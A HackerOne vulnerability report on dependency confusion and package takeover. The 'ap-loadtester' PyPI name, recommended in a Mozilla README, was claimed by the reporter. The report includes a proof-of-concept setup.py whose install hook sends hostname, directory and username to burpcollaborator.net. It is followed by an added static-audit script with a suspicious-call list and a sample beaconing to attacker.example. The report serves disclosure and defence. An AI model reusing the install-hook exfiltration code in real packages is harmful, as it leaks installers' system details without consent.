autopush-rs
code injection through pip
HackerOne Report: https://hackerone.com/reports/2097694
Report Date: 2023-08-05 17:06:15 UTC
Reporter: anupamas01
Weakness: Code Injection
Initial Report:
Summary:
Hello team, I found a pip package through which I can run malicious commands.
Steps To Reproduce:
- Go to https://github.com/mozilla-services/autopush-loadtester (as it is heavily used, I have not uploaded a higher version, which may affect production).
- There you can see:
  $ pip install ap-loadtester
  You can see I have taken it over at https://pypi.org/project/ap-loadtester/ (in Maintainers). When you install it, it will install my pip package.
POC: https://pypi.org/project/ap-loadtester/ (right now I am not uploading any code; if the program allows, I will upload it)
```python
from setuptools import setup
from setuptools.command.install import install
import requests
import socket
import getpass
import os


class CustomInstall(install):
    # Runs at `pip install` time, after the normal install step.
    def run(self):
        install.run(self)
        hostname = socket.gethostname()
        cwd = os.getcwd()
        username = getpass.getuser()
        ploads = {'hostname': hostname, 'cwd': cwd, 'username': username}
        # Beacon host, cwd and user to an attacker-controlled endpoint;
        # replace burpcollaborator.net with Interactsh or pipedream.
        requests.get("https://burpcollaborator.net", params=ploads)


setup(name='ap-loadtester',  # package name
      version='1.0.0',
      description='test',
      author='test',
      license='MIT',
      zip_safe=False,
      cmdclass={'install': CustomInstall})
```
Impact: code injection through the pip package.
Thanks, AnupamAs01
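The attack above works because pip, when it builds a source distribution, executes the package's setup.py, and setuptools honours any `cmdclass` override, so a subclass of `install` (or `develop`, `egg_info`, `build_py`) runs attacker code on every install. The check a practitioner wants before trusting a name copied out of a README is to obtain the sdist without building it and inspect setup.py for install-time hooks and outbound calls. The following static audit is an added example, not part of the HackerOne report or of the autopush projects; the two setup.py samples are constructed to mirror the PoC and a benign package, the `attacker.example` host is a placeholder, and the lists of hook base classes and suspicious calls are this example's own heuristics.

```python
"""Static audit of a setup.py for install-time hooks and suspicious calls (added example)."""
import ast

# setuptools/distutils command classes whose run() executes during a pip build/install.
INSTALL_HOOK_BASES = {"install", "develop", "egg_info", "build_py", "build_ext", "sdist"}

# Calls that have no business in package metadata and are typical of install-time payloads.
SUSPICIOUS_CALLS = {
    "os.system", "os.popen",
    "subprocess.run", "subprocess.Popen", "subprocess.call", "subprocess.check_output",
    "requests.get", "requests.post", "urllib.request.urlopen", "socket.socket",
    "exec", "eval", "__import__", "importlib.import_module", "base64.b64decode",
}


def _dotted_name(node):
    """Return 'a.b.c' for a Name/Attribute chain, or None for anything else."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return None


def audit_setup_py(source: str) -> list[str]:
    """Return human-readable findings; an empty list means nothing suspicious was seen."""
    findings = []
    for node in ast.walk(ast.parse(source)):
        if isinstance(node, ast.ClassDef):
            for base in node.bases:
                name = _dotted_name(base)
                if name and name.split(".")[-1] in INSTALL_HOOK_BASES:
                    findings.append(
                        f"line {node.lineno}: class {node.name} subclasses setuptools command '{name}'")
        elif isinstance(node, ast.Call):
            callee = _dotted_name(node.func)
            if callee in SUSPICIOUS_CALLS:
                findings.append(f"line {node.lineno}: call to {callee}")
            if callee == "setup":
                for kw in node.keywords:
                    if kw.arg == "cmdclass":
                        findings.append(f"line {node.lineno}: setup() overrides cmdclass")
    return findings


def is_safe_to_build(source: str) -> bool:
    """True only when the heuristic audit reports nothing."""
    return not audit_setup_py(source)


# Constructed sample: a setup.py shaped like the PoC (not the real package's file).
MALICIOUS_SETUP = '''
from setuptools import setup
from setuptools.command.install import install
import requests, socket, getpass, os

class CustomInstall(install):
    def run(self):
        install.run(self)
        ploads = {"hostname": socket.gethostname(), "cwd": os.getcwd(),
                  "username": getpass.getuser()}
        requests.get("https://attacker.example", params=ploads)  # placeholder host

setup(name="ap-loadtester", version="1.0.0", cmdclass={"install": CustomInstall})
'''

# Constructed sample: an ordinary setup.py with no command overrides.
BENIGN_SETUP = '''
from setuptools import setup, find_packages
setup(name="ap-loadtester", version="1.0.0", packages=find_packages())
'''


if __name__ == "__main__":
    for label, src in (("malicious", MALICIOUS_SETUP), ("benign", BENIGN_SETUP)):
        print(f"{label}: safe={is_safe_to_build(src)}")
        for f in audit_setup_py(src):
            print("  ", f)
```

Fetch the sdist tarball directly from the project's Files page rather than with `pip download`, since pip still runs the sdist's metadata build step (and therefore setup.py) to resolve it; extract the archive and run `audit_setup_py` over its setup.py before any `pip install`. Where the dependency has wheels, `pip install --only-binary :all:` avoids executing setup.py entirely. The audit is a name-matching heuristic: obfuscated payloads (`exec` of a decoded blob, dynamic imports) are flagged by the `exec`/`__import__`/`base64.b64decode` entries, but a determined attacker can still evade it, so treat a clean result as a screen, not a proof of safety.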
Issue is synchronized with this Jira Bug: https://mozilla-hub.atlassian.net/browse/SYNC-3860
Attachments: [F2576644] image.png (https://mozilla-hub.atlassian.net/rest/api/2/attachment/content/40617)